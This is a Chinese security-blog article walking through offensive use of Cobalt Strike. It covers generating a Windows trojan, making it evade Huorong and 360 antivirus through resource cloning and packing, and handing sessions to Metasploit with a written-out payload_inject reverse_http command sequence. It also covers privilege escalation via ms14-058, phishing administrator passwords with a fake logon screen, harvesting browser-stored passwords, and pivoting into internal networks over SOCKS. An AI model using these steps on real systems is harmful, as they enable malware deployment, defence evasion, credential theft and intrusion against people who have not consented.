本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
作者:掌控安全 - hpb1 分享!
周六我一般会分享些工具,昨天发了个哥斯拉的攻击分析,今天就直接来一篇干货,关于 cs 这也是在后台常看见的消息,今天他来啦!
作为一款协同 APT 工具,功能十分强大,针对内网的渗透测试和作为 apt 的控制终端功能,使其变成众多 APT 组织的首选
fireeye 多次分析过实用 cobaltstrike 进行 apt 的案例。
CS 需要一个服务器来进行,我们把它放到服务器上。
然后运行./teaserver ip 密码即可。
然后使用 CS 客户端连接即可,输入对应 ip、端口和密码。
首先创建监听器
攻击 -》生成后门-》windows executable, 选择监听点击保存即可生成木马
不过 CS 生成木马已经被杀软加入病毒库,很容易别查杀,所以我们需进行一些免杀操作。
-
修改特征码
-
花指令免杀
-
加壳免杀
-
内存免杀
-
二次编译
-
分离免杀
-
资源修改
这里使用前辈的免杀木马脚本,虽然已经被加入病毒库了,但是通过常见免杀还是可以 Bypass 杀软。
首先打开应用Restorator,拖进木马和网易云,把网易云所有资源信息都复制到木马上,点击保存即可。
不过这样子修改的话,还是不太行,还是被火绒查杀了
那么我们对这个木马,进行加壳,检测选项基本都勾上,点击“保护”即可生成。
我们再打开杀软查杀,发现组合免杀生效了,绕过了火绒和 360
尝试运行看看是否会被查杀,可以看到没有拦截,成功上线了。
当我们获得一个 CS 木马会话时,那么该怎么传递到 msf 呢?
其实也挺简单的,再配置一个监听器,设置模块为Foreign HTTP。
配置好后在上线的主机上右击Spawn(增加会话),选择Foreign HTTP监听模块,
这时候 msf 监听那边就会接收到会话
这里还是新建一个监听器,设置模块为beacon HTTP
接下来把 kali 上获得的meterpreter会话转发到cobaltstrike主机上,
这里我们需要用到一个exploit模块:
1. exploit/windows/local/payload_inject
2. set payload windows/meterpreter/reverse_http
3. set DisablePayloadHandler true
4. set lhost 192.168.43.147
5. set lport 8081
6. set session 4
7. run
这时候返回客户端可以发现已经返回一个名为 CS 的会话
当我们拿到会话时,首先应该输入sleep 1来修改响应时间,
因为 cs 默认执行命令响应为60/s,这样子太慢了。
影响实验效率
接下来要怎么提权呢?
我们回到beacon shell输入elevate查看可用的提权脚本,发现只有两个。
为了丰富我们的提权脚本,我们可以自己导入一个多提权脚本。
导入很简单:cobalt strike-》脚本-》laod->选择要导入cna即可。
导入成功后,我们使用各个导入的脚本尝试提权:
右键会话-》梼杌-》权限维持-》ms14-058,
这时候可以看到返回一个system的会话,说明提权成功。
有时候获取到会话时,因为目标系统版本过高,无法直接使用猕猴桃读取密码,还得去修改注册表,这就很麻烦。
这时候我们就可以用 c 语言写一个钓鱼的系统登录页面来窃取密码,在 beacon 输入命令execute-assembly FakeLogonScreen.exe即可
此时目标服务器弹出了登录页面,目标管理员一看到应该也没有什么怀疑,直接就输入密码。
这时候我们的 cs 客户端可以看到管理员输入的内容了。
很多人为了操作方便,习惯性的将密码储存在浏览器中。
这使得攻击者可以利用人懒得特性,来进行获取存储在浏览器里的密码。
当我们拿下内网后,就可以扫描存在内网中的网站,因为很多测试网站都处于内网中且安全性低。这样就可以攻击内网网站了。
会话右键 -》中转 -》SOCKS Server 开启 socks4 代理,选择想要的端口,打开 proxifier 输入我们刚刚选择的端口即可,对内网做更多操作。
后台回复 "cs" 获取脚本
@
**欢迎加我微信:zkaq99、**实时分享安全动态
[
超级牛批的 IP 地址查询工具
2021-06-25
[
震惊!从一个 0day 到两个 0day 的奇妙之旅
2021-06-23
[
黑客技能|教你用手机代替各类门禁卡
2021-06-22
[
实战 | 偶遇一赌博网站,渗透诛之!
2021-06-20
[
一条 Fofa 搜索语法,实现批量挖洞
2021-06-15
[
黑客技能|断网攻击与监听演示
2021-06-04